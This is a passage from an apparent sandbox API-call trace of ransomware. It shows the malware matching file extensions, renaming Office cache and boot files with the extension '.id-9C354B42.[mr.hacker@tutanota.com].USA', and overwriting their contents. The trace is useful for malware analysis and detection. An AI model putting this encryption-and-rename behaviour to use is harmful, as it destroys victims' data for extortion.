dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.237] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.237] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.237] lstrlenW (lpString=".doc") returned 4 [0035.237] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.237] lstrlenW (lpString=".docx") returned 5 [0035.237] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.237] lstrlenW (lpString=".pdf") returned 4 [0035.237] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.237] lstrlenW (lpString=".xls") returned 4 [0035.237] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.238] lstrlenW (lpString=".xlsx") returned 5 [0035.238] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.238] lstrlenW (lpString=".ppt") returned 4 [0035.238] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.238] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.238] lstrlenW (lpString=".zip") returned 4 [0035.238] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.238] lstrlenW (lpString=".rar") returned 4 [0035.238] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.238] lstrlenW (lpString=".bz2") returned 4 [0035.238] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.238] lstrlenW (lpString=".7z") returned 3 [0035.238] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.238] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.238] lstrlenW (lpString=".dbf") returned 4 [0035.238] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.238] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.238] lstrlenW (lpString=".1cd") returned 4 [0035.238] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.238] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.238] lstrlenW (lpString=".jpg") returned 4 [0035.238] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.238] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.238] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.238] lstrlenW (lpString=".doc") returned 4 [0035.238] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.238] lstrlenW (lpString=".docx") returned 5 [0035.238] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.238] lstrlenW (lpString=".pdf") returned 4 [0035.238] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.238] lstrlenW (lpString=".xls") returned 4 [0035.239] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.239] lstrlenW (lpString=".xlsx") returned 5 [0035.239] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.239] lstrlenW (lpString=".ppt") returned 4 [0035.239] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.239] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.239] lstrlenW (lpString=".zip") returned 4 [0035.239] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.239] lstrlenW (lpString=".rar") returned 4 [0035.239] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.239] lstrlenW (lpString=".bz2") returned 4 [0035.239] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.239] lstrlenW (lpString=".7z") returned 3 [0035.239] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.239] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.239] lstrlenW (lpString=".dbf") returned 4 [0035.239] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.239] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.239] lstrlenW (lpString=".1cd") returned 4 [0035.239] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.239] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.239] lstrlenW (lpString=".jpg") returned 4 [0035.239] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.239] lstrcmpiW (lpString1=".exe", lpString2=".USA") returned -1 [0035.240] lstrlenW (lpString="memtest.exe") returned 11 [0035.240] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.240] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=485760) returned 1 [0035.240] CloseHandle (hObject=0x1b8) returned 1 [0035.240] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe")) returned 0x20 [0035.240] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\memtest.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.240] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.240] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0035.240] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0035.240] lstrlenW (lpString=".doc") returned 4 [0035.240] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0035.240] lstrlenW (lpString=".docx") returned 5 [0035.240] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0035.240] lstrlenW (lpString=".pdf") returned 4 [0035.240] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0035.240] lstrlenW (lpString=".xls") returned 4 [0035.241] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0035.241] lstrlenW (lpString=".xlsx") returned 5 [0035.241] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0035.241] lstrlenW (lpString=".ppt") returned 4 [0035.241] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0035.241] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0035.241] lstrlenW (lpString=".zip") returned 4 [0035.241] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0035.241] lstrlenW (lpString=".rar") returned 4 [0035.241] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0035.241] lstrlenW (lpString=".bz2") returned 4 [0035.241] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0035.241] lstrlenW (lpString=".7z") returned 3 [0035.241] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0035.243] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0035.244] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.244] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0x0) returned 1 [0035.244] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.244] ReadFile (in: hFile=0x1b8, lpBuffer=0x3cd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3cd0058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.253] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.253] ReadFile (in: hFile=0x1b8, lpBuffer=0x3d10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d10058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.412] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0035.412] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xfefcbb, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.412] ReadFile (in: hFile=0x1b8, lpBuffer=0x3d50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d50058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.433] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.433] WriteFile (in: hFile=0x1b8, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x350fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0035.640] SetEndOfFile (hFile=0x1b8) returned 1 [0035.640] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fe70b8 [0035.644] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.644] WriteFile (in: hFile=0x1b8, lpBuffer=0x3fe70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70b8*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.645] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.645] WriteFile (in: hFile=0x1b8, lpBuffer=0x3fe70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70b8*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.646] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xfefcbb, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.646] WriteFile (in: hFile=0x1b8, lpBuffer=0x3fe70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70b8*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.647] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70b8 | out: hHeap=0x5d0000) returned 1 [0035.647] CloseHandle (hObject=0x1b8) returned 1 [0038.966] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0038.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.967] lstrlenW (lpString=".doc") returned 4 [0038.967] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0038.967] lstrlenW (lpString=".docx") returned 5 [0038.967] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0038.967] lstrlenW (lpString=".pdf") returned 4 [0038.967] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0038.967] lstrlenW (lpString=".xls") returned 4 [0038.967] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0038.967] lstrlenW (lpString=".xlsx") returned 5 [0038.967] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0038.967] lstrlenW (lpString=".ppt") returned 4 [0038.967] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0038.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.967] lstrlenW (lpString=".zip") returned 4 [0038.967] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0038.967] lstrlenW (lpString=".rar") returned 4 [0038.967] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0038.967] lstrlenW (lpString=".bz2") returned 4 [0038.967] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0038.967] lstrlenW (lpString=".7z") returned 3 [0038.967] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0038.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.968] lstrlenW (lpString=".dbf") returned 4 [0038.968] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0038.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.968] lstrlenW (lpString=".1cd") returned 4 [0038.968] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0038.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.968] lstrlenW (lpString=".jpg") returned 4 [0038.968] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0038.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.968] lstrlenW (lpString=".doc") returned 4 [0038.968] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0038.968] lstrlenW (lpString=".docx") returned 5 [0038.968] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0038.968] lstrlenW (lpString=".pdf") returned 4 [0038.968] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0038.968] lstrlenW (lpString=".xls") returned 4 [0038.968] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0038.968] lstrlenW (lpString=".xlsx") returned 5 [0038.968] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0038.968] lstrlenW (lpString=".ppt") returned 4 [0038.968] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0038.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.968] lstrlenW (lpString=".zip") returned 4 [0038.968] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0038.968] lstrlenW (lpString=".rar") returned 4 [0038.968] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0038.968] lstrlenW (lpString=".bz2") returned 4 [0038.968] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0038.968] lstrlenW (lpString=".7z") returned 3 [0038.968] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0038.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.968] lstrlenW (lpString=".dbf") returned 4 [0038.969] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0038.969] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.969] lstrlenW (lpString=".1cd") returned 4 [0038.969] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0038.969] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.969] lstrlenW (lpString=".jpg") returned 4 [0038.969] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0038.969] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0038.969] lstrlenW (lpString="OutlookMUI.msi") returned 14 [0038.969] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0038.969] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=2865664) returned 1 [0038.969] CloseHandle (hObject=0x1c4) returned 1 [0038.969] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi")) returned 0x2020 [0038.969] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0038.970] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0038.970] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0038.970] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0x0) returned 1 [0038.970] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.971] ReadFile (in: hFile=0x1c4, lpBuffer=0x3cd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3cd0058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.099] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xe9355, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.099] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d10058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.211] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0039.211] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x27ba00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.211] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d50058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.229] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.229] WriteFile (in: hFile=0x1c4, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x350fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0039.248] SetEndOfFile (hFile=0x1c4) returned 1 [0039.468] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fa70b0 [0039.472] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.472] WriteFile (in: hFile=0x1c4, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.505] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xe9355, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.505] WriteFile (in: hFile=0x1c4, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.510] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x27ba00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.510] WriteFile (in: hFile=0x1c4, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.514] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fa70b0 | out: hHeap=0x5d0000) returned 1 [0039.515] CloseHandle (hObject=0x1c4) returned 1 [0040.132] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0040.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0040.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0040.132] lstrlenW (lpString=".doc") returned 4 [0040.132] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0040.132] lstrlenW (lpString=".docx") returned 5 [0040.132] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0040.132] lstrlenW (lpString=".pdf") returned 4 [0040.133] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0040.133] lstrlenW (lpString=".xls") returned 4 [0040.133] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0040.133] lstrlenW (lpString=".xlsx") returned 5 [0040.133] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0040.133] lstrlenW (lpString=".ppt") returned 4 [0040.133] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0040.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0040.133] lstrlenW (lpString=".zip") returned 4 [0040.133] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0040.133] lstrlenW (lpString=".rar") returned 4 [0040.133] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0040.133] lstrlenW (lpString=".bz2") returned 4 [0040.133] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0040.133] lstrlenW (lpString=".7z") returned 3 [0040.133] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0040.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0040.133] lstrlenW (lpString=".dbf") returned 4 [0040.133] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0040.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0040.133] lstrlenW (lpString=".1cd") returned 4 [0040.133] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0040.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0040.133] lstrlenW (lpString=".jpg") returned 4 [0040.133] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0040.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0040.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0040.133] lstrlenW (lpString=".doc") returned 4 [0040.133] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0040.133] lstrlenW (lpString=".docx") returned 5 [0040.133] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0040.133] lstrlenW (lpString=".pdf") returned 4 [0040.133] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0040.133] lstrlenW (lpString=".xls") returned 4 [0040.133] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0040.134] lstrlenW (lpString=".xlsx") returned 5 [0040.134] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0040.134] lstrlenW (lpString=".ppt") returned 4 [0040.134] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0040.134] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0040.134] lstrlenW (lpString=".zip") returned 4 [0040.134] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0040.134] lstrlenW (lpString=".rar") returned 4 [0040.134] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0040.134] lstrlenW (lpString=".bz2") returned 4 [0040.134] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0040.134] lstrlenW (lpString=".7z") returned 3 [0040.134] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0040.134] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 